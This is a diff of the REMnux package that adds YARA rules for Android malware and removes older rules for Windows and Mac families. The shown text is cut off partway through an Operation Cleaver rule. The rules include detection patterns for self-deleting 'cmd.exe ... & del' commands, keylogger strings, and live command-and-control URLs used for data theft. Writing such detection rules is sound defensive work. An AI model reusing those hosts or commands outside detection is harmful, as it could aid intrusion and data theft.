@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*
+import "androguard"
+
+rule android_overlayer
+{
+	meta:
+		description = "This rule detects the banker trojan with overlaying functionality"
+		source =  "https://www.zscaler.com/blogs/research/android-banker-malware-goes-social"
+		author = "Koodous Project"
+
+	strings:
+		$str_1 = "tel:"
+		$str_2 = "lockNow" nocase
+		$str_3 = "android.app.action.ADD_DEVICE_ADMIN"
+		$str_4 = "Cmd_conf" nocase
+		$str_5 = "Sms_conf" nocase
+		$str_6 = "filter2" 
+
+	condition:
+		androguard.certificate.sha1("6994ED892E7F0019BCA74B5847C6D5113391D127") or 
+		
+		(androguard.permission(/android.permission.INTERNET/) and
+		androguard.permission(/android.permission.READ_SMS/) and
+		androguard.permission(/android.permission.READ_PHONE_STATE/) and 
+		all of ($str_*))
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Pink_Locker.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Pink_Locker.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Pink_Locker.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Pink_Locker.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,34 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule Android_pinkLocker : android
+{
+	meta:
+		description = "Yara detection for Android Locker app named Pink Club"
+		author = "@5h1vang"
+		ref1 = "https://www.virustotal.com/es/file/388799cbbe2c8ddc0768c4b994379508e602f68503888a001635c3be2c8c350d/analysis/"
+		ref2 = "https://analyst.koodous.com/rulesets/1186"
+		sample = "388799cbbe2c8ddc0768c4b994379508e602f68503888a001635c3be2c8c350d"
+		
+	strings:
+		$str_1 = "arnrsiec sisani"
+		$str_2 = "rhguecisoijng ts"
+		$str_3 = "assets/data.db"
+		$str_4 = "res/xml/device_admin_sample.xmlPK" 
+
+	condition:
+		androguard.url(/lineout\.pw/) or 
+		androguard.certificate.sha1("D88B53449F6CAC93E65CA5E224A5EAD3E990921E") or
+		androguard.permission(/android.permission.INTERNET/) and
+		androguard.permission(/android.permission.DISABLE_KEYGUARD/) and
+		all of ($str_*)
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_pornClicker.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_pornClicker.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_pornClicker.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_pornClicker.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,26 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "androguard"
+
+
+
+rule trojan: pornClicker 
+{
+	meta:
+		description = "Ruleset to detect android pornclicker trojan, connects to a remote host and obtains javascript and a list from urls generated, leading to porn in the end."
+		sample = "5a863fe4b141e14ba3d9d0de3a9864c1339b2358386e10ba3b4caec73b5d06ca"
+ 		reference = "https://blog.malwarebytes.org/cybercrime/2016/06/trojan-clickers-gaze-cast-upon-google-play-store/?utm_source=facebook&utm_medium=social"
+    author = "Koodous Project"
+    
+	strings:
+		$a = "SELEN3333"
+		$b = "SELEN33"
+		$c = "SELEN333"
+		$api = "http://mayis24.4tubetv.xyz/dmr/ya"
+		
+	condition:
+		($a and $b and $c and $api) or androguard.url(/mayis24\.4tubetv\.xyz/)
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_RuMMS.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_RuMMS.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_RuMMS.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_RuMMS.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+import "androguard"
+
+rule Android_RuMMS
+{
+	meta:
+		author = "reverseShell - https://twitter.com/JReyCastro"
+		date = "2016/04/02"
+		description = "This rule try to detects Android.Banking.RuMMS"
+		sample = "13569bc8343e2355048a4bccbe92a362dde3f534c89acff306c800003d1d10c6 "
+		source = "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html"
+
+	condition:
+		androguard.package_name("org.starsizew") or
+		androguard.package_name("com.tvone.untoenynh") or
+		androguard.package_name("org.zxformat") and
+		androguard.permission(/android.permission.RECEIVE_SMS/) and
+		androguard.permission(/android.permission.RECEIVE_BOOT_COMPLETED/)
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_SlemBunk.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_SlemBunk.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_SlemBunk.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_SlemBunk.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+
+rule SlemBunk : android
+{
+	meta:
+		description = "Rule to detect trojans imitating banks of North America, Eurpope and Asia"
+		author = "@plutec_net"
+		sample = "e6ef34577a75fc0dc0a1f473304de1fc3a0d7d330bf58448db5f3108ed92741b"
+		source = "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html"
+
+	strings:
+		$a = "#intercept_sms_start"
+		$b = "#intercept_sms_stop"
+		$c = "#block_numbers"
+		$d = "#wipe_data"
+		$e = "Visa Electron"
+
+	condition:
+		all of them
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_SMSFraud.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_SMSFraud.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_SMSFraud.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_SMSFraud.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,39 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+rule smsfraud1 : android
+{
+    meta:
+        author = "Antonio Sánchez https://twitter.com/plutec_net"
+        reference = "https://koodous.com/"
+        description = "This rule detects a kind of SMSFraud trojan"
+        sample = "265890c3765d9698091e347f5fcdcf1aba24c605613916820cc62011a5423df2"
+        sample2 = "112b61c778d014088b89ace5e561eb75631a35b21c64254e32d506379afc344c"
+
+    strings:
+        $a = "E!QQAZXS"
+        $b = "__exidx_end"
+        $c = "res/layout/notify_apkinstall.xmlPK"
+
+    condition:
+    all of them
+        
+}
+
+rule smsfraud2 : android {
+    meta:
+        author = "Antonio Sánchez https://twitter.com/plutec_net"
+        reference = "https://koodous.com/"
+        sample = "0200a454f0de2574db0b58421ea83f0f340bc6e0b0a051fe943fdfc55fea305b"
+        sample2 = "bff3881a8096398b2ded8717b6ce1b86a823e307c919916ab792a13f2f5333b6"
+
+    strings:
+        $a = "pluginSMS_decrypt"
+        $b = "pluginSMS_encrypt"
+        $c = "__dso_handle"
+        $d = "lib/armeabi/libmylib.soUT"
+        $e = "]Diok\"3|"
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_SpyAgent.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_SpyAgent.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_SpyAgent.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_SpyAgent.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,32 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "androguard"
+
+
+rule spyAgent
+{
+	meta:
+		description = "This rule detects arabian spyware which records call and gathers user information which is later sent to a remote c&c"
+		sample = "7cbf61fbb31c26530cafb46282f5c90bc10fe5c724442b8d1a0b87a8125204cb"
+		reference = "https://blogs.mcafee.com/mcafee-labs/android-spyware-targets-security-job-seekers-in-saudi-arabia/"
+		author = "@koodous_project"
+
+	strings:
+		$phone = "0597794205"
+		$caption = "New victim arrived"
+		$cc = "http://ksa-sef.com/Hack%20Mobaile/ADDNewSMS.php"
+		$cc_alt = "http://ksa-sef.com/Hack%20Mobaile/AddAllLogCall.php"
+		$cc_alt2= "http://ksa-sef.com/Hack%20Mobaile/addScreenShot.php"
+		$cc_alt3= "http://ksa-sef.com/Hack%20Mobaile/ADDSMS.php"
+		$cc_alt4 = "http://ksa-sef.com/Hack%20Mobaile/ADDVCF.php"
+		$cc_alt5 = "http://ksa-sef.com/Hack%20Mobaile/ADDIMSI.php"
+		$cc_alt6 = "http://ksa-sef.com/Hack%20Mobaile/ADDHISTORYINTERNET.php"
+		$cc_alt7 = "http://ksa-sef.com/Hack%20Mobaile/addInconingLogs.php"
+
+	condition:
+		androguard.url(/ksa-sef\.com/) or ($phone and $caption) or ($cc and $cc_alt and $cc_alt2 and $cc_alt3 and $cc_alt4 and $cc_alt5 and $cc_alt6 and $cc_alt7)
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Spywaller.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Spywaller.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Spywaller.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Spywaller.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,31 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+import "androguard"
+
+
+rule android_spywaller : android
+{
+	meta:
+		description = "Rule for detection of Android Spywaller samples"
+		sample = "7b31656b9722f288339cb2416557241cfdf69298a749e49f07f912aeb1e5931b"
+		source = "http://blog.fortinet.com/post/android-spywaller-firewall-style-antivirus-blocking"
+
+	strings:
+		$str_1 = "droid.png"
+		$str_2 = "getSrvAddr"
+		$str_3 = "getSrvPort"		
+		$str_4 = "android.intent.action.START_GOOGLE_SERVICE"
+
+	condition:
+		androguard.certificate.sha1("165F84B05BD33DA1BA0A8E027CEF6026B7005978") or
+		androguard.permission(/android.permission.INTERNET/) and
+		androguard.permission(/android.permission.READ_PHONE_STATE/) and 
+		all of ($str_*)
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Tachi.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Tachi.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Tachi.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Tachi.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,31 @@
+rule tachi : android
+{
+	meta:
+		author = "https://twitter.com/plutec_net"
+		source = "https://analyst.koodous.com/rulesets/1332"
+		description = "This rule detects tachi apps (not all malware)"
+		sample = "10acdf7db989c3acf36be814df4a95f00d370fe5b5fda142f9fd94acf46149ec"
+
+	strings:
+		$a = "svcdownload"
+		$xml_1 = "<config>"
+		$xml_2 = "<apptitle>"
+		$xml_3 = "<txinicio>"
+		$xml_4 = "<txiniciotitulo>"
+		$xml_5 = "<txnored>"
+		$xml_6 = "<txnoredtitulo>"
+		$xml_7 = "<txnoredretry>"
+		$xml_8 = "<txnoredsalir>"
+		$xml_9 = "<laurl>"
+		$xml_10 = "<txquieresalir>"
+		$xml_11 = "<txquieresalirtitulo>"
+		$xml_12 = "<txquieresalirsi>"
+		$xml_13 = "<txquieresalirno>"
+		$xml_14 = "<txfiltro>"
+		$xml_15 = "<txfiltrourl>"
+		$xml_16 = "<posicion>"
+
+
+	condition:
+		$a and 4 of ($xml_*)
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Triada_Banking.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Triada_Banking.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Triada_Banking.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Triada_Banking.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule Android_Triada : android
+{
+	meta:
+		author = "reverseShell - https://twitter.com/JReyCastro"
+		date = "2016/03/04"
+		description = "This rule try to detects Android.Triada.Malware"
+		sample = "4656aa68ad30a5cf9bcd2b63f21fba7cfa0b70533840e771bd7d6680ef44794b"
+		source = "https://securelist.com/analysis/publications/74032/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/"
+		
+	strings:
+		$string_1 = "android/system/PopReceiver"
+	condition:
+		all of ($string_*) and
+		androguard.permission(/android.permission.KILL_BACKGROUND_PROCESSES/) and
+		androguard.permission(/android.permission.SYSTEM_ALERT_WINDOW/) and
+		androguard.permission(/android.permission.GET_TASKS/)
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_VikingOrder.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_VikingOrder.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_VikingOrder.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_VikingOrder.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+import "androguard"
+import "cuckoo"
+
+
+rule VikingBotnet
+{
+	meta:
+	  author = "https://twitter.com/koodous_project"
+		description = "Rule to detect Viking Order Botnet."
+		sample = "85e6d5b3569e5b22a16245215a2f31df1ea3a1eb4d53b4c286a6ad2a46517b0c"
+
+	strings:
+		$a = "cv7obBkPVC2pvJmWSfHzXh"
+		$b = "http://joyappstech.biz:11111/knock/"
+		$c = "I HATE TESTERS onGlobalLayout"
+		$d = "http://144.76.70.213:7777/ecspectapatronum/"
+		
+	condition:
+		($a and $c) or ($b and $d) 
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_VirusPolicia.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_VirusPolicia.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_VirusPolicia.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_VirusPolicia.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,43 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule BaDoink : official android
+{
+		meta:
+		author = "Fernando Denis https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "Virus de la Policia - android"
+		sample = "9bc0fb0f05bbf25507104a4eb74e8066b194a8e6a57670957c0ad1af92189921"
+
+	strings:
+		
+		//$url_string_1 = "http://police-mobile-stop.com"
+		//$url_string_2 = "http://mobile-policeblock.com"
+		
+		$type_a_1 ="6589y459gj4058rt"
+	
+		$type_b_1 = "Q,hu4P#hT;U!XO7T,uD"
+		$type_b_2 = "+Gkwg#M!lf>Laq&+J{lg"
+
+//		$type_c_1 = "ANIM_STYLE_CLOSE_ENTER"
+//		$type_c_2 = "TYPE_VIEW_ACCESSIBILITY_FOCUSED"
+//		$type_c_3 = "TYPE_VIEW_TEXT_SELECTION_CHANGED"
+//		$type_c_4 = "FLAG_REQUEST_ENHANCED_WEB_ACCESSIBILITY"
+
+	condition:
+		androguard.app_name("BaDoink") or
+		//all of ($url_string_*) or
+		$type_a_1 or
+		all of ($type_b*) 
+//		all of ($type_c_*)
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Naikon.yara remnux-rules-0.0.4/yara/Naikon.yara
--- remnux-rules-0.0.3/yara/Naikon.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Naikon.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,53 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule NaikonCode : Naikon Family 
-{
-    meta:
-        description = "Naikon code features"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-    
-    strings:
-        // decryption
-        $ = { 0F AF C1 C1 E0 1F } // imul eax, ecx; shl eah, 1fh
-        $ = { 35 5A 01 00 00} // xor eax, 15ah
-        $ = { 81 C2 7F 14 06 00 } // add edx, 6147fh
-    
-    condition:
-        all of them
-}
-
-rule NaikonStrings : Naikon Family
-{
-    meta:
-        description = "Naikon Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    strings:
-        $ = "NOKIAN95/WEB"
-        $ = "/tag=info&id=15"
-        $ = "skg(3)=&3.2d_u1"
-        $ = "\\Temp\\iExplorer.exe"
-        $ = "\\Temp\\\"TSG\""
-        
-    condition:
-       any of them
-}
-
-rule Naikon : Family
-{
-    meta:
-        description = "Naikon"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    condition:
-        NaikonCode or NaikonStrings
-}
-
diff -Nru remnux-rules-0.0.3/yara/naspyupdate.yara remnux-rules-0.0.4/yara/naspyupdate.yara
--- remnux-rules-0.0.3/yara/naspyupdate.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/naspyupdate.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,51 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule nAspyUpdateCode : nAspyUpdate Family 
-{
-    meta:
-        description = "nAspyUpdate code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-14"
-    
-    strings:
-        // decryption loop in dropper
-        $ = { 8A 54 24 14 8A 01 32 C2 02 C2 88 01 41 4E 75 F4 }
-        
-    condition:
-        any of them
-}
-
-rule nAspyUpdateStrings : nAspyUpdate Family
-{
-    meta:
-        description = "nAspyUpdate Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-07-14"
-        
-    strings:
-        $ = "\\httpclient.txt"
-        $ = "password <=14"
-        $ = "/%ldn.txt"
-        $ = "Kill You\x00"
-        
-    condition:
-        any of them
-}
-
-rule nAspyUpdate : Family
-{
-    meta:
-        description = "nAspyUpdate"
-        author = "Seth Hardy"
-        last_modified = "2014-07-14"
-        
-    condition:
-        nAspyUpdateCode or nAspyUpdateStrings
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/NetPass.yara remnux-rules-0.0.4/yara/NetPass.yara
--- remnux-rules-0.0.3/yara/NetPass.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/NetPass.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,39 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule NetpassStrings : NetPass Variant {
-
-        meta:
-                description = "Identifiers for netpass variant"
-                author = "Katie Kleemola"
-                last_updated = "2014-05-29"
-
-        strings:
-		$exif1 = "Device Protect ApplicatioN" wide
-		$exif2 = "beep.sys" wide //embedded exe name
-		$exif3 = "BEEP Driver" wide //embedded exe description
-		
-		$string1 = "\x00NetPass Update\x00"
-		$string2 = "\x00%s:DOWNLOAD\x00"
-		$string3 = "\x00%s:UPDATE\x00"
-		$string4 = "\x00%s:uNINSTALL\x00"
-
-        condition:
-                all of ($exif*) or any of ($string*)
-
-}	
-
-rule NetPass : Variant {
-	meta:
-		description = "netpass variant"
-		author = "Katie Kleemola"
-		last_updated = "2014-07-08"
-	condition:
-		NetpassStrings
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/netwiredRC.yara remnux-rules-0.0.4/yara/netwiredRC.yara
--- remnux-rules-0.0.3/yara/netwiredRC.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/netwiredRC.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,48 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-rule NetWiredRC_B : rat 
-{
-	meta:
-		description = "NetWiredRC"
-		author = "Jean-Philippe Teissier / @Jipe_"
-		date = "2014-12-23"
-		filetype = "memory"
-		version = "1.1" 
-
-	strings:
-		$mutex = "LmddnIkX"
-
-		$str1 = "%s.Identifier"
-		$str2 = "%d:%I64u:%s%s;"
-		$str3 = "%s%.2d-%.2d-%.4d"
-		$str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
-		$str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d"
-		
-		$klg1 = "[Backspace]"
-		$klg2 = "[Enter]"
-		$klg3 = "[Tab]"
-		$klg4 = "[Arrow Left]"
-		$klg5 = "[Arrow Up]"
-		$klg6 = "[Arrow Right]"
-		$klg7 = "[Arrow Down]"
-		$klg8 = "[Home]"
-		$klg9 = "[Page Up]"
-		$klg10 = "[Page Down]"
-		$klg11 = "[End]"
-		$klg12 = "[Break]"
-		$klg13 = "[Delete]"
-		$klg14 = "[Insert]"
-		$klg15 = "[Print Screen]"
-		$klg16 = "[Scroll Lock]"
-		$klg17 = "[Caps Lock]"
-		$klg18 = "[Alt]"
-		$klg19 = "[Esc]"
-		$klg20 = "[Ctrl+%c]"
-
-	condition: 
-		$mutex or (1 of ($str*) and 1 of ($klg*))
-}
diff -Nru remnux-rules-0.0.3/yara/Njrat.yara remnux-rules-0.0.4/yara/Njrat.yara
--- remnux-rules-0.0.3/yara/Njrat.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Njrat.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,35 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Njrat
-{
-    meta:
-        description = "Njrat"
-	author = "botherder https://github.com/botherder"
-
-    strings:
-        $string1 = /(F)romBase64String/
-        $string2 = /(B)ase64String/
-        $string3 = /(C)onnected/ wide ascii
-        $string4 = /(R)eceive/
-        $string5 = /(S)end/ wide ascii
-        $string6 = /(D)ownloadData/ wide ascii
-        $string7 = /(D)eleteSubKey/ wide ascii
-        $string8 = /(g)et_MachineName/
-        $string9 = /(g)et_UserName/
-        $string10 = /(g)et_LastWriteTime/
-        $string11 = /(G)etVolumeInformation/
-        $string12 = /(O)SFullName/ wide ascii
-        $string13 = /(n)etsh firewall/ wide
-        $string14 = /(c)md\.exe \/k ping 0 & del/ wide
-        $string15 = /(c)md\.exe \/c ping 127\.0\.0\.1 & del/ wide
-        $string16 = /(c)md\.exe \/c ping 0 -n 2 & del/ wide
-        $string17 = {7C 00 27 00 7C 00 27 00 7C}
-
-    condition:
-        10 of them
-}
diff -Nru remnux-rules-0.0.3/yara/Notepad.yara remnux-rules-0.0.4/yara/Notepad.yara
--- remnux-rules-0.0.3/yara/Notepad.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Notepad.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,21 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule TROJAN_Notepad {
-    meta:
-        Author = "RSA_IR"
-        Date     = "4Jun13"
-        File     = "notepad.exe v 1.1"
-        MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"
-    strings:
-        $s1 = "75BAA77C842BE168B0F66C42C7885997"
-        $s2 = "B523F63566F407F3834BCC54AAA32524"
-    condition:
-        $s1 or $s2
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/NSFree.yara remnux-rules-0.0.4/yara/NSFree.yara
--- remnux-rules-0.0.3/yara/NSFree.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/NSFree.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,53 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule NSFreeCode : NSFree Family 
-{
-    meta:
-        description = "NSFree code features"
-        author = "Seth Hardy"
-        last_modified = "2014-06-24"
-    
-    strings:
-        // push vars then look for MZ
-        $ = { 53 56 57 66 81 38 4D 5A }
-        // nops then look for PE\0\0
-        $ = { 90 90 90 90 81 3F 50 45 00 00 }
-    
-    condition:
-        all of them
-}
-
-rule NSFreeStrings : NSFree Family
-{
-    meta:
-        description = "NSFree Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-24"
-        
-    strings:
-        $ = "\\MicNS\\" nocase
-        $ = "NSFreeDll" wide ascii
-        // xor 0x58 dos stub
-        $ = { 0c 30 31 2b 78 28 2a 37 3f 2a 39 35 78 3b 39 36 36 37 }
-        
-    condition:
-       any of them
-}
-
-rule NSFree : Family
-{
-    meta:
-        description = "NSFree"
-        author = "Seth Hardy"
-        last_modified = "2014-06-24"
-        
-    condition:
-        NSFreeCode or NSFreeStrings
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/Olyx.yara remnux-rules-0.0.4/yara/Olyx.yara
--- remnux-rules-0.0.3/yara/Olyx.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Olyx.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,46 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule OlyxCode : Olyx Family 
-{
-    meta:
-        description = "Olyx code tricks"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    strings:
-        $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 }
-        $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C }
-        
-    condition:
-        any of them
-}
-
-rule OlyxStrings : Olyx Family
-{
-    meta:
-        description = "Olyx Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    strings:
-        $ = "/Applications/Automator.app/Contents/MacOS/DockLight"
-       
-    condition:
-        any of them
-}
-
-rule Olyx : Family
-{
-    meta:
-        description = "Olyx"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    condition:
-        OlyxCode or OlyxStrings
-}
diff -Nru remnux-rules-0.0.3/yara/Opcleaver.yara remnux-rules-0.0.4/yara/Opcleaver.yara
--- remnux-rules-0.0.3/yara/Opcleaver.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Opcleaver.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,335 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule OPCLEAVER_BackDoorLogger
-{
-	meta:
-		description = "Keylogger used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "BackDoorLogger"
-		$s2 = "zhuAddress"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_Jasus
-{
-	meta:
-		description = "ARP cache poisoner used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "pcap_dump_open"
-		$s2 = "Resolving IPs to poison..."
